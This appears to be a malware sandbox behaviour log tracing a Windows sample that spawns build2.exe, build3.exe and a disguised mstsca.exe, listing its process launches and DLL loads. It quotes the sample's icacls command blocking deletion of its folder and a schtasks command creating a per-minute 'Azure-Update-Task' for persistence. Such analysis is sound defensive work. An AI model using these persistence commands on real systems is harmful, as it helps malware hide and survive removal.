Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\Desktop\SUwX12D2S6.exe "C:\Users\user\Desktop\SUwX12D2S6.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe" Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe --Task
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe"
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Process created: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe "C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe"
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Process created: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe "C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: browcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SUwX12D2S6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build2.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\7dff3941-d69c-460f-a7ee-d94d9d9159b1\build3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\b191416f-b6d0-4993-9bf9-b06958fd5666\SUwX12D2S6.exe Section loaded: winmm.dll
